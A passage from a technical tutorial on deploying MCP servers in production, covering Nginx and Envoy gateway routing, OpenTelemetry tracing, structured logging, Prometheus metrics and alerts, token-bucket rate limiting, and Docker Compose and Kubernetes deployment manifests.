        """Pull tool lists from all backends and build an aggregated index."""
        self.tool_index = {}
        for backend_name, backend_url in self.BACKENDS.items():
            try:
                # Call each backend's tools/list endpoint
                resp = await self.client.post(
                    f"{backend_url}/mcp",
                    json={
                        "jsonrpc": "2.0",
                        "id": 1,
                        "method": "tools/list",
                        "params": {}
                    }
                )
                data = resp.json()
                tools = data.get("result", {}).get("tools", [])
                for tool in tools:
                    tool["_backend"] = backend_name
                    tool["_backend_url"] = backend_url
                    self.tool_index[tool["name"]] = tool
            except Exception as e:
                print(f"[REGISTRY] Backend {backend_name} unreachable: {e}")

    def get_tool_backend(self, tool_name: str) -> str | None:
        """Look up the backend URL for a given tool name."""
        tool = self.tool_index.get(tool_name)
        return tool["_backend_url"] if tool else None

    def list_all_tools(self) -> List[dict]:
        """Return all registered tools across all backends."""
        return list(self.tool_index.values())

The tool discovery flow:

  1. On startup: ToolRegistry sends tools/list requests to all backends, building an aggregated tool index.
  2. Client requests tool list: The gateway's /mcp/discovery endpoint returns the aggregated list of all tools.
  3. Tool call routing: When a client invokes a tool, the gateway looks up the tool name in the registry and forwards the request to the corresponding backend server.
  4. Periodic refresh: Re-pull tool lists every 60 seconds so newly added or removed tools are reflected in real time.

Load balancing strategies

Different tool categories have different load characteristics. Nginx supports multiple load balancing algorithms—choose per upstream:

Strategy Nginx Directive Best For Example Tool Categories
Round Robin (default) Uniform load distribution; all requests cost roughly the same File ops, simple queries, config reads
Least Connections least_conn; Operations with high variance in duration; avoids stacking slow requests on one backend Database queries, data migrations
IP Hash ip_hash; Session stickiness—same client always hits same backend Stateful integrations (Slack, Jira)
Weighted server ... weight=N; Backends with different capacity (e.g., some instances on larger EC2/GCE types) Mixed-instance pools during scaling events

Tenant-aware routing

In multi-tenant scenarios, different tenants' requests must route to separate backend instances to ensure data and resource isolation. This is achieved by passing a tenant identifier in the request header:

# Nginx gateway: route by tenant header to different backends
map $http_x_tenant_id $tenant_backend {
    "tenant-a"    "mcp_tenant_a";
    "tenant-b"    "mcp_tenant_b";
    default       "mcp_default";
}

upstream mcp_tenant_a {
    server 127.0.0.1:3101;
    keepalive 16;
}

upstream mcp_tenant_b {
    server 127.0.0.1:3102;
    keepalive 16;
}

server {
    listen 443 ssl http2;
    server_name mcp-gateway.example.com;

    location /mcp {
        proxy_pass http://$tenant_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Tenant-ID $http_x_tenant_id;  # Forward tenant ID to backend
        proxy_set_header Connection "";
        proxy_read_timeout 300s;
    }
}

Clients include X-Tenant-ID: tenant-a in their request header. Nginx routes the request to the corresponding backend based on this header. Each tenant gets its own MCP Server instance, its own Docker sandbox resource pool, and its own database connection—no cross-tenant data leakage.

Envoy: the next level for programmable MCP gateways

If your team is on AWS (using App Mesh or ECS Service Connect) or GCP (using Anthos Service Mesh or Traffic Director), Envoy is the standard sidecar proxy powering these service meshes. For MCP gateways specifically, Envoy offers:

  • xDS dynamic configuration—update routing rules without reloading the gateway, critical for zero-downtime operations.
  • Native gRPC and HTTP/2 support—if your MCP Server implementations use gRPC for internal service-to-service communication alongside JSON-RPC for client-facing endpoints.
  • WASM plugin extensibility—write custom MCP protocol filters in Rust, Go, or C++ without forking Envoy.
  • Rich observability—native OpenTelemetry integration, detailed per-request metrics (upstream connect time, retries, circuit breaker state).

An Envoy-based MCP gateway configuration (envoy.yaml excerpt):

# envoy-mcp-gateway.yaml — Envoy MCP multi-server gateway (excerpt)
static_resources:
  listeners:
  - name: mcp_gateway_listener
    address:
      socket_address: { address: 0.0.0.0, port_value: 443 }
    filter_chains:
    - transport_socket:
        name: envoy.transport_sockets.tls
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.DownstreamTlsContext
          common_tls_context:
            tls_certificates:
            - certificate_chain: { filename: "/etc/certs/mcp-gateway.pem" }
              private_key: { filename: "/etc/certs/mcp-gateway.key" }
      filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          stat_prefix: mcp_gateway
          route_config:
            name: mcp_routes
            virtual_hosts:
            - name: mcp_backends
              domains: ["mcp-gateway.example.com"]
              routes:
              # Filesystem tools → filesystem cluster
              - match: { prefix: "/mcp/filesystem" }
                route: { cluster: mcp_filesystem, timeout: 120s }
              # Database tools → database cluster
              - match: { prefix: "/mcp/database" }
                route: { cluster: mcp_database, timeout: 300s }
              # Integrations → integrations cluster
              - match: { prefix: "/mcp/integrations" }
                route: { cluster: mcp_integrations, timeout: 180s }
              # Tool discovery → registry cluster
              - match: { prefix: "/mcp/discovery" }
                route: { cluster: mcp_registry, timeout: 30s }
          http_filters:
          - name: envoy.filters.http.router
            typed_config:
              "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router

  clusters:
  - name: mcp_filesystem
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: ROUND_ROBIN
    load_assignment:
      cluster_name: mcp_filesystem
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3001 }}}
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3011 }}}
  - name: mcp_database
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: LEAST_REQUEST
    load_assignment:
      cluster_name: mcp_database
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3002 }}}
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3012 }}}
  - name: mcp_integrations
    connect_timeout: 5s
    type: STRICT_DNS
    lb_policy: RING_HASH
    load_assignment:
      cluster_name: mcp_integrations
      endpoints:
      - lb_endpoints:
        - endpoint: { address: { socket_address: { address: 127.0.0.1, port_value: 3003 }}}}

For teams already on AWS ECS with App Mesh or GCP with Traffic Director, Envoy is the natural MCP gateway choice—it integrates directly with your existing service mesh and cloud monitoring stack (CloudWatch or Cloud Monitoring). For smaller deployments without a service mesh, Nginx remains the simpler and equally capable option.

For more background on Agent frameworks and multi-agent patterns:

  • Building an Agent Framework from Scratch — Tools, Memory, and Planning
  • Multi-Agent Debate — Let AI Agents Challenge Each Other

6. Monitoring, Logging and Observability

An invisible MCP Server is an unreliable MCP Server

After security hardening and gateway routing, the third essential production capability is observability—you must know:

  • How many clients are currently connected?
  • Which tools are called the most? Which are never called?
  • What's the average tool call response time? Has it suddenly degraded?
  • How many authentication failures today? Is someone brute-forcing API keys?
  • Is server process memory growing continuously (memory leak)?

Without this data, your MCP Server is a black box—you only learn about problems when users complain. This section builds the MCP observability triad: distributed tracing, structured logging, and metrics monitoring.

OpenTelemetry JSON-RPC distributed tracing

MCP is built on JSON-RPC 2.0—every tool call is an RPC invocation. OpenTelemetry is the CNCF standard for cloud-native observability. We can write middleware that automatically creates a Span for every JSON-RPC request:

# otel_middleware.py — OpenTelemetry JSON-RPC tracing middleware
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import Status, StatusCode
import time
import functools

# Initialize OpenTelemetry (load config from env vars in production)
trace.set_tracer_provider(TracerProvider())
otlp_exporter = OTLPSpanExporter(
    endpoint="http://localhost:4317",  # OTLP Collector address (AWS X-Ray, GCP Cloud Trace, Honeycomb)
    insecure=True,
)
trace.get_tracer_provider().add_span_processor(
    BatchSpanProcessor(otlp_exporter)
)

tracer = trace.get_tracer("mcp-server", "1.0.0")


def trace_jsonrpc(method: str):
    """JSON-RPC method tracing decorator.
    Creates an OpenTelemetry Span for every MCP JSON-RPC method call,
    automatically recording call parameters, execution time, and exceptions.

    Usage:
        @trace_jsonrpc("tools/call")
        async def handle_tool_call(request_id, params):
            ...
    """
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(request_id, params, *args, **kwargs):
            span_name = f"mcp.{method}"

            with tracer.start_as_current_span(
                span_name,
                kind=trace.SpanKind.SERVER,
                attributes={
                    SpanAttributes.RPC_SYSTEM: "jsonrpc",
                    SpanAttributes.RPC_METHOD: method,
                    SpanAttributes.RPC_JSONRPC_REQUEST_ID: str(request_id),
                    "mcp.tool.name": params.get("name", "unknown"),
                }
            ) as span:
                start_time = time.time()
                try:
                    result = await func(request_id, params, *args, **kwargs)
                    duration_ms = (time.time() - start_time) * 1000

                    # Record success metrics on the span
                    span.set_attribute("mcp.duration_ms", duration_ms)
                    span.set_attribute("mcp.status", "success")
                    span.set_status(Status(StatusCode.OK))

                    return result

                except Exception as e:
                    duration_ms = (time.time() - start_time) * 1000

                    # Record error details on the span
                    span.set_attribute("mcp.duration_ms", duration_ms)
                    span.set_attribute("mcp.status", "error")
                    span.set_attribute("mcp.error.type", type(e).__name__)
                    span.set_attribute("mcp.error.message", str(e)[:500])
                    span.set_status(Status(StatusCode.ERROR, str(e)))
                    span.record_exception(e)

                    raise
        return wrapper
    return decorator


# ========== Usage example ==========

@trace_jsonrpc("tools/call")
async def handle_tool_call(request_id: str, params: dict):
    """MCP tools/call handler — automatically traces every tool invocation."""
    tool_name = params.get("name")
    tool_args = params.get("arguments", {})

    # Actual tool execution logic...
    result = await execute_tool(tool_name, tool_args)

    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "result": {
            "content": [{"type": "text", "text": str(result)}]
        }
    }

What this middleware gives you:

  • Automatic Span creation: Every JSON-RPC call generates a Span with full metadata—tool name, request ID, method type.
  • Automatic exception recording: Any thrown exception is captured, recorded on the Span, and annotated with error type.
  • Performance data: Duration (milliseconds) is recorded on every call. In Honeycomb, Datadog APM, or Grafana Tempo, you can directly see the latency distribution of your call chain—and cross-reference with logs using request_id.

The OTLP exporter endpoint in the code above points to localhost:4317. In a cloud deployment, point it to:

  • AWS: AWS Distro for OpenTelemetry Collector → X-Ray
  • GCP: OpenTelemetry Collector → Cloud Trace
  • Honeycomb: Direct OTLP ingest at https://api.honeycomb.io
  • Datadog: OTLP ingest via Datadog Agent or direct intake

Structured JSON logging

MCP Server logs must be structured—plain text logs are nearly useless for troubleshooting at scale. Output every log line as JSON:

# structured_logging.py — MCP Server structured logging configuration
import json
import logging
import sys
from datetime import datetime, timezone

class MCPJsonFormatter(logging.Formatter):
    """Outputs JSON-formatted structured logs for easy
    aggregation and querying in log platforms (CloudWatch, ELK, Loki, Datadog)."""

    def format(self, record: logging.LogRecord) -> str:
        log_entry = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            "module": record.module,
            "function": record.funcName,
            "line": record.lineno,
        }

        # Inject additional context fields (if provided via extra_fields)
        extra_fields = getattr(record, "extra_fields", {})
        log_entry.update(extra_fields)

        # Include exception info if present
        if record.exc_info:
            log_entry["exception"] = self.formatException(record.exc_info)

        return json.dumps(log_entry, ensure_ascii=False)


def get_mcp_logger(name: str) -> logging.Logger:
    """Get an MCP Logger pre-configured for JSON output.

    Usage:
        logger = get_mcp_logger("mcp.tool.filesystem")
        logger.info("Tool call completed", extra={
            "extra_fields": {
                "tool": "search_files",
                "user": "user-123",
                "duration_ms": 42,
                "sandbox_id": "abc12345"
            }
        })
    """
    logger = logging.getLogger(name)
    logger.setLevel(logging.INFO)
    logger.propagate = False  # Don't propagate to root logger to avoid duplicates

    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(MCPJsonFormatter())

    # Ensure no duplicate handlers
    if not logger.handlers:
        logger.addHandler(handler)

    return logger

A typical MCP tool call log line looks like:

{
  "timestamp": "2026-05-17T10:32:15.421Z",
  "level": "INFO",
  "logger": "mcp.tool.filesystem",
  "message": "Tool call completed",
  "module": "filesystem_server",
  "function": "handle_tool_call",
  "line": 87,
  "tool": "search_files",
  "user": "user-123",
  "duration_ms": 42,
  "sandbox_id": "abc12345",
  "exit_code": 0
}

With structured logs, in CloudWatch Logs Insights, ELK, Loki, or Datadog Logs, you can filter and aggregate by fields like tool, user, duration_ms directly—no regex parsing of log text needed. Run a query like level=ERROR | stats count(*) by tool to instantly find which tools are failing the most.

Health check endpoint (Kubernetes probes)

In production, Kubernetes or your load balancer needs to periodically probe whether the MCP Server is healthy. A proper health check endpoint should not just return 200 OK—it should verify that critical dependencies are functional:

# health_check.py — MCP Server health check endpoint (K8s-compatible)
from starlette.responses import JSONResponse
import asyncio
import time

# Global state
_server_start_time = time.time()

async def health_check(request):
    """Deep health check.
    Checks:
    1. MCP Server process is running (basic liveness)
    2. Tool registry is reachable (dependency service)
    3. Docker sandbox engine is functional (runtime dependency)
    """
    checks = {
        "server": "ok",
        "uptime_seconds": int(time.time() - _server_start_time),
    }

    # Check tool registry
    try:
        import httpx
        async with httpx.AsyncClient(timeout=3.0) as client:
            resp = await client.get("http://127.0.0.1:3000/health")
            checks["tool_registry"] = "ok" if resp.status_code == 200 else "degraded"
    except Exception:
        checks["tool_registry"] = "unreachable"

    # Check Docker sandbox engine
    try:
        import subprocess
        result = subprocess.run(
            ["docker", "info", "--format", "{{.ServerVersion}}"],
            capture_output=True, text=True, timeout=5
        )
        checks["docker_engine"] = "ok" if result.returncode == 0 else "error"
    except Exception:
        checks["docker_engine"] = "unavailable"

    # Determine overall health status
    overall = "healthy" if not any(
        v in ("unreachable", "unavailable", "error")
        for v in checks.values()
    ) else "degraded"

    status_code = 200 if overall == "healthy" else 503

    return JSONResponse(
        {
            "status": overall,
            "checks": checks,
            "timestamp": int(time.time()),
        },
        status_code=status_code,
    )

Kubernetes probes referencing this endpoint:

# k8s-deployment.yaml excerpt — MCP Server liveness & readiness probes
livenessProbe:
  httpGet:
    path: /health
    port: 3000
  initialDelaySeconds: 30
  periodSeconds: 15
  failureThreshold: 3

readinessProbe:
  httpGet:
    path: /health
    port: 3000
  initialDelaySeconds: 10
  periodSeconds: 10
  failureThreshold: 2

Prometheus metrics and alerting

Tracing and logging help you troubleshoot after a problem occurs. Metrics and alerting help you catch problems before users notice. Here are the core Prometheus metrics every MCP Server should expose:

# metrics.py — MCP Server Prometheus metrics
from prometheus_client import Counter, Histogram, Gauge, generate_latest, CollectorRegistry
import time
import functools

# === Metric definitions ===

# Tool call counter (labeled by tool name and status)
tool_calls_total = Counter(
    "mcp_tool_calls_total",
    "Total number of tool calls",
    ["tool_name", "status"]  # status: success | error | timeout | permission_denied
)

# Tool call duration distribution
tool_call_duration_seconds = Histogram(
    "mcp_tool_call_duration_seconds",
    "Tool call duration in seconds",
    ["tool_name"],
    buckets=[0.01, 0.05, 0.1, 0.5, 1.0, 2.0, 5.0, 10.0, 30.0, 60.0]
)

# Authentication failure counter
auth_failures_total = Counter(
    "mcp_auth_failures_total",
    "Total number of authentication failures",
    ["reason"]  # reason: expired_token | invalid_token | missing_token
)

# Active connection gauge
active_connections = Gauge(
    "mcp_active_connections",
    "Current number of active client connections"
)

# Sandbox containers running
sandbox_containers_running = Gauge(
    "mcp_sandbox_containers_running",
    "Current number of sandbox containers executing"
)

# Tool call rate (rolling window)
tool_call_rate = Gauge(
    "mcp_tool_call_rate_per_minute",
    "Tool call rate per minute",
    ["tool_name"]
)

# === Convenience recording function ===

def record_tool_call(tool_name: str):
    """Decorator / context manager — automatically records tool call metrics."""
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            start = time.time()
            try:
                result = await func(*args, **kwargs)
                duration = time.time() - start
                tool_calls_total.labels(tool_name=tool_name, status="success").inc()
                tool_call_duration_seconds.labels(tool_name=tool_name).observe(duration)
                return result
            except PermissionDeniedError:
                tool_calls_total.labels(tool_name=tool_name, status="permission_denied").inc()
                raise
            except Exception:
                duration = time.time() - start
                tool_calls_total.labels(tool_name=tool_name, status="error").inc()
                tool_call_duration_seconds.labels(tool_name=tool_name).observe(duration)
                raise
        return wrapper
    return decorator


# Expose Prometheus /metrics endpoint
async def metrics_endpoint(request):
    """Prometheus metrics scrape endpoint."""
    from starlette.responses import PlainTextResponse
    return PlainTextResponse(
        generate_latest(),
        media_type="text/plain; version=0.0.4"
    )

Alerting rules and threshold guidance

Based on the metrics above, configure these alerting rules in your monitoring stack. The PromQL expressions work directly in Prometheus Alertmanager; the thresholds apply equally in Datadog Monitors, Honeycomb Triggers, or Grafana Alerting:

Alert Name PromQL / Condition Severity Action
High tool error rate rate(mcp_tool_calls_total{status="error"}[5m]) / rate(mcp_tool_calls_total[5m]) > 0.05 P1 (Critical) Check recent deployments, backend dependency availability
Tool call latency spike histogram_quantile(0.95, rate(mcp_tool_call_duration_seconds_bucket[5m])) > 10 P2 (Warning) Check backend response times, sandbox resource availability
Auth failure rate surge rate(mcp_auth_failures_total[5m]) > 10 P1 (Critical) Possible attack — check client IP distribution and failure reasons
Abnormal sandbox count mcp_sandbox_containers_running > 50 P2 (Warning) Possible zombie containers — inspect Docker processes
Abnormal connection count mcp_active_connections > 1000 P2 (Warning) Check for connection leaks or anomalous traffic

Integrating with cloud monitoring stacks

Signal Type AWS Stack GCP Stack Vendor-Agnostic
Tracing AWS X-Ray (via ADOT Collector) Cloud Trace Honeycomb, Datadog APM
Logging CloudWatch Logs Cloud Logging ELK, Loki, Datadog Logs
Metrics CloudWatch Metrics + AMP Cloud Monitoring Prometheus + Grafana, Datadog
Alerting CloudWatch Alarms → SNS Cloud Monitoring → PagerDuty PagerDuty, Opsgenie, Grafana OnCall

In all cases, route alerts through PagerDuty or your incident management platform of choice. The key integration point is the Prometheus Alertmanager webhook—it can forward to PagerDuty, Slack, Opsgenie, or any webhook receiver. Set up escalation policies so a P1 alert that isn't acknowledged within 5 minutes automatically pages the on-call engineer.

Observability is the last line of defense in production—it doesn't prevent problems, but it ensures you know about them the moment they happen, with enough data to trace the root cause. Together with authentication (line 1) and sandbox isolation (line 2), it forms the three-layer defense for production MCP Server deployments.

For more on monitoring production LLM systems:

  • Multi-Agent Debate — Let AI Agents Challenge Each Other

7. Rate Limiting and Abuse Prevention

An MCP Server without rate limiting is a DDoS invitation

Authentication and authorization answer "who can call" and "what can they call." But even a legitimate, authenticated user can—intentionally or accidentally—flood your server with tool calls and exhaust all available resources.

In the MCP context, rate limiting faces three unique challenges:

  • LLM "tool frenzy": An AI Agent in its reasoning loop may fire 10-30 consecutive tool calls. If each call spins up a Docker container, resource consumption grows exponentially with active agents.
  • Streaming long-lived connections: Streamable HTTP SSE connections can last minutes. Traditional "requests per second" rate models don't cleanly map to long-running tool executions.
  • Multi-client shared server: A single MCP Server instance serves multiple clients. One abusive client must never degrade the experience of others.

The solution: token-bucket rate limiting with per-client quota isolation.

Token-bucket rate limiter middleware (TypeScript)

The token-bucket algorithm is the most common rate-limiting strategy in production—tokens refill at a fixed rate into a bucket, each request consumes one token, and requests are rejected when the bucket is empty. It naturally supports burst traffic (however many tokens are stockpiled is the burst ceiling), producing smoother behavior than fixed-window counters.

// rate-limiter.ts — MCP Server token-bucket rate limiter middleware
// Independent of the auth layer; can be stacked

interface TokenBucket {
  tokens: number;         // Current available tokens
  lastRefill: number;     // Last refill timestamp (ms)
  capacity: number;       // Bucket capacity (max tokens)
  refillRate: number;     // Token refill rate (tokens/sec)
}

class RateLimiter {
  private buckets: Map<string, TokenBucket> = new Map();

  constructor(
    private defaultCapacity: number = 60,     // Default 60 tokens (burst capacity)
    private defaultRefillRate: number = 10,   // Default 10 tokens/sec refill
  ) {}

  /**
   * Retrieve or create a token bucket for a given client.
   * @param clientId — Client identifier (Mcp-Session-Id or user_id)
   * @param config   — Optional per-client capacity and rate override
   */
  private getBucket(
    clientId: string,
    config?: { capacity?: number; refillRate?: number }
  ): TokenBucket {
    if (!this.buckets.has(clientId)) {
      this.buckets.set(clientId, {
        tokens: config?.capacity ?? this.defaultCapacity,
        lastRefill: Date.now(),
        capacity: config?.capacity ?? this.defaultCapacity,
        refillRate: config?.refillRate ?? this.defaultRefillRate,
      });
    }
    return this.buckets.get(clientId)!;
  }

  /**
   * Attempt to consume one token.
   * @returns { allowed: boolean, retryAfter?: number, remaining: number }
   */
  tryConsume(
    clientId: string,
    config?: { capacity?: number; refillRate?: number }
  ): { allowed: boolean; retryAfter?: number; remaining: number } {
    const bucket = this.getBucket(clientId, config);
    const now = Date.now();

    // Calculate tokens to add since last refill
    const elapsed = (now - bucket.lastRefill) / 1000; // seconds
    const tokensToAdd = elapsed * bucket.refillRate;
    bucket.tokens = Math.min(bucket.capacity, bucket.tokens + tokensToAdd);
    bucket.lastRefill = now;

    if (bucket.tokens >= 1) {
      bucket.tokens -= 1;
      return { allowed: true, remaining: Math.floor(bucket.tokens) };
    }

    // Estimate wait time until next token refills (seconds)
    const waitSeconds = Math.ceil((1 - bucket.tokens) / bucket.refillRate);
    return { allowed: false, retryAfter: waitSeconds, remaining: 0 };
  }

  /** Purge buckets inactive for >10 minutes to prevent memory growth */
  cleanup(maxAgeMs: number = 600_000): void {
    const now = Date.now();
    for (const [clientId, bucket] of this.buckets) {
      if (now - bucket.lastRefill > maxAgeMs) {
        this.buckets.delete(clientId);
      }
    }
  }
}

// Global singleton
export const rateLimiter = new RateLimiter();

// Purge stale buckets every 60 seconds
setInterval(() => rateLimiter.cleanup(), 60_000);

Key design choices in this token-bucket implementation:

  • Lazy refill: Tokens are calculated on-demand during each request rather than via a background timer—simpler, no extra threads.
  • Per-client isolation: Each client gets an independent token bucket. One user's burst never starves another's quota.
  • Overridable config: Different clients can have different capacities and rates—VIP tenants get more generous quotas.
  • Auto-cleanup: Buckets idle for 10+ minutes are automatically purged, preventing unbounded memory growth.

Integrating rate limiting into the MCP HTTP Server

Embed the rate limiter as Express middleware, applied after authentication but before tool execution:

// mcp-middleware.ts — Rate limiting integrated into MCP HTTP Server
import express from "express";
import { rateLimiter } from "./rate-limiter";

const app = express();

// Layer 1: Auth middleware (validates Bearer token, extracts user_id)
app.use("/mcp", authMiddleware);

// Layer 2: Rate limiting middleware (per-client quota check)
app.use("/mcp", (req, res, next) => {
  // Identify client: Mcp-Session-Id header > auth-injected userId > fallback to IP
  const clientId = req.headers["mcp-session-id"] as string
    || (req as any).userId
    || req.ip;

  const result = rateLimiter.tryConsume(clientId);

  // Track rate-limit hits (feed into Prometheus metrics)
  if (!result.allowed) {
    mcp_rate_limited_total.labels(clientId).inc();
  }

  // Expose quota status via response headers
  res.setHeader("X-RateLimit-Remaining", String(result.remaining));
  res.setHeader("X-RateLimit-Limit", "60");

  if (!result.allowed) {
    res.setHeader("Retry-After", String(result.retryAfter));
    return res.status(429).json({
      jsonrpc: "2.0",
      error: {
        code: -32000,
        message: "Rate limit exceeded. Please retry after the specified interval.",
        data: {
          retryAfter: result.retryAfter,
          clientId: clientId,
        }
      },
      id: null,
    });
  }

  next();
});

// Layer 3: MCP tool call handler
app.post("/mcp", mcpHandler);

Tool execution quotas: not all tools cost the same

A global "N requests per minute" limit is too coarse. A query_metrics call (sub-millisecond in-memory lookup) and a deploy_service call (triggers a CI/CD pipeline, may run 10+ minutes) have vastly different costs. You need tool-level weight quotas.

Tool weight table:

Tool Category Weight Max Concurrent Example Tools
Light queries 1x 50 query_metrics, read_logs, search_files
Medium operations 3x 20 run_migration, update_config, send_notification
Heavy operations 10x 5 deploy_service, provision_cluster, run_benchmark
Dangerous operations Global mutex 1 delete_cluster, reset_database, revoke_access

Implementing tool weight quotas:

// tool-quota.ts — Tool weight quota management
const TOOL_WEIGHTS: Record<string, number> = {
  query_metrics: 1,
  read_logs: 1,
  search_files: 1,
  run_migration: 3,
  update_config: 3,
  deploy_service: 10,
  provision_cluster: 10,
};

// Global concurrent tool execution counter
let activeConcurrentCalls = 0;
const MAX_CONCURRENT_CALLS = 50;

function checkToolQuota(toolName: string, userId: string): { allowed: boolean; reason?: string } {
  const weight = TOOL_WEIGHTS[toolName] || 1;

  // Concurrent call budget check
  if (activeConcurrentCalls + weight > MAX_CONCURRENT_CALLS) {
    return {
      allowed: false,
      reason: `Server busy: ${activeConcurrentCalls} active calls, tool weight ${weight}, exceeds limit ${MAX_CONCURRENT_CALLS}`
    };
  }

  // Dangerous operations: global mutex (use Redis distributed lock in production)
  if (weight >= 10) {
    // Check if another heavy operation is already executing
    // In production: acquire Redis lock `tool-mutex:${toolName}` with TTL
  }

  return { allowed: true };
}

Multi-layer DoS protection strategies

Layer Strategy Implementation Defends Against
Network IP-level rate limiting + connection caps Nginx limit_req_zone + limit_conn SYN floods, IP-level abuse
Application Token-bucket per-client rate limiting Custom middleware (code in this section) Single-client high-frequency calls, tool enumeration attacks
Tool Weight quotas + concurrency caps checkToolQuota() pre-execution gate Heavy tools starving resources, dangerous operation conflicts
Sandbox CPU/memory hard limits + timeout kill Docker cgroups + timeout_seconds Single tool execution resource explosion
Observability Rate-limit hit counter + anomaly alerting Prometheus mcp_rate_limited_total metric Early detection of attack patterns, rate-limit parameter tuning

Rate limiting isn't about "as strict as possible." Too strict degrades the user experience; too loose offers no protection. Start with generous parameters (e.g., 60 tokens per bucket, 10 tokens/sec refill) and gradually tighten based on Prometheus metrics and real-world usage patterns.

8. Production Deployment Checklist

From code to production: a complete deployment map

The previous seven sections cover MCP Server security hardening, architecture design, and observability. This section ties them all together—what you need to do, and in what order, when you're ready to go live.

The checklist below is ordered by deployment stage. Each item is tagged with a priority (P0 = must complete before launch, P1 = strongly recommended, P2 = iterate post-launch):

  1. P0: Transport hardening — Switch to Streamable HTTP + TLS termination (see Section 2)
  2. P0: Authentication & authorization — OAuth 2.1 Bearer Token + tool-level RBAC (see Section 3)
  3. P0: Tool sandboxing — Docker container isolation + network restrictions (see Section 4)
  4. P1: Multi-server gateway — Nginx reverse proxy + tool routing (see Section 5)
  5. P1: Observability — OpenTelemetry tracing + structured logging + Prometheus metrics (see Section 6)
  6. P1: Rate limiting & anti-abuse — Token bucket + tool weight quotas (see Section 7)
  7. P2: Containerized deployment — Docker Compose / Kubernetes (this section)
  8. P2: CI/CD pipeline — Automated build, test, release (this section)
  9. P2: Secrets management — Env vars → Vault upgrade path (this section)
  10. P2: Rolling updates & rollback — Zero-downtime deployment strategy (this section)

Docker Compose deployment: from single process to containerized

The minimal production-grade deployment—one docker-compose.yml covering MCP Server + Nginx gateway + Prometheus monitoring:

# docker-compose.yml — MCP production single-host deployment
version: "3.9"

services:
  # === MCP Server core service ===
  mcp-server:
    build:
      context: .
      dockerfile: Dockerfile
    container_name: mcp-server
    restart: unless-stopped
    ports:
      - "127.0.0.1:3000:3000"          # Localhost only, proxied by Nginx
    environment:
      - MCP_TRANSPORT=http
      - MCP_PORT=3000
      - JWT_SECRET=${JWT_SECRET}       # Injected from .env file
      - JWT_ISSUER=https://auth.example.com
      - OTEL_EXPORTER_OTLP_ENDPOINT=http://jaeger:4317
      - DOCKER_HOST=unix:///var/run/docker.sock  # Sandbox needs Docker socket
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock  # Enable sandbox container launch
      - mcp-logs:/var/log/mcp
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:3000/health"]
      interval: 15s
      timeout: 5s
      retries: 3
    deploy:
      resources:
        limits:
          cpus: "2"
          memory: "512M"

  # === Nginx reverse proxy (TLS termination + rate limiting) ===
  nginx:
    image: nginx:1.25-alpine
    container_name: mcp-nginx
    restart: unless-stopped
    ports:
      - "443:443"
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf:ro
      - ./certs:/etc/ssl/certs:ro          # TLS certs (read-only mount)
      - nginx-logs:/var/log/nginx
    depends_on:
      - mcp-server
    healthcheck:
      test: ["CMD", "nginx", "-t"]
      interval: 30s
      timeout: 5s
      retries: 3

  # === Prometheus metrics collection ===
  prometheus:
    image: prom/prometheus:v2.48.0
    container_name: mcp-prometheus
    restart: unless-stopped
    ports:
      - "127.0.0.1:9090:9090"
    volumes:
      - ./prometheus.yml:/etc/prometheus/prometheus.yml:ro
      - prometheus-data:/prometheus
    command:
      - "--config.file=/etc/prometheus/prometheus.yml"
      - "--storage.tsdb.retention.time=30d"

volumes:
  mcp-logs:
  nginx-logs:
  prometheus-data:

Accompanying .env file (never commit to Git):

# .env — Production environment variables (injected via Docker Compose, never in the image)
JWT_SECRET=your-production-jwt-secret-min-32-chars
JWT_ISSUER=https://auth.example.com
MCP_TRANSPORT=http
MCP_PORT=3000

Kubernetes deployment: multi-replica + autoscaling

Docker Compose works for single-host or small deployments. For production environments requiring high availability and autoscaling, Kubernetes is the standard choice:

# k8s/deployment.yaml — MCP Server Kubernetes Deployment
apiVersion: apps/v1
kind: Deployment
metadata:
  name: mcp-server
  namespace: mcp-production
  labels:
    app: mcp-server
spec:
  replicas: 3                        # 3 replicas for high availability
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxSurge: 1                    # At most 1 extra Pod during rollout
      maxUnavailable: 0              # Zero downtime during rollout
  selector:
    matchLabels:
      app: mcp-server
  template:
    metadata:
      labels:
        app: mcp-server
        version: "1.0.0"
    spec:
      serviceAccountName: mcp-server-sa
      containers:
        - name: mcp-server
          image: registry.example.com/mcp-server:1.0.0
          imagePullPolicy: IfNotPresent
          ports:
            - containerPort: 3000
              name: http
            - containerPort: 9090
              name: metrics
          env:
            - name: MCP_TRANSPORT
              value: "http"
            - name: MCP_PORT
              value: "3000"
            # Secrets injected from Kubernetes Secret
            - name: JWT_SECRET
              valueFrom:
                secretKeyRef:
                  name: mcp-secrets
                  key: jwt-secret
            - name: JWT_ISSUER
              valueFrom:
                secretKeyRef:
                  name: mcp-secrets
                  key: jwt-issuer
            - name: OTEL_EXPORTER_OTLP_ENDPOINT
              value: "http://otel-collector:4317"
          resources:
            requests:
              cpu: "500m"
              memory: "256Mi"
            limits:
              cpu: "2"
              memory: "512Mi"
          livenessProbe:
            httpGet:
              path: /health
              port: 3000
            initialDelaySeconds: 30
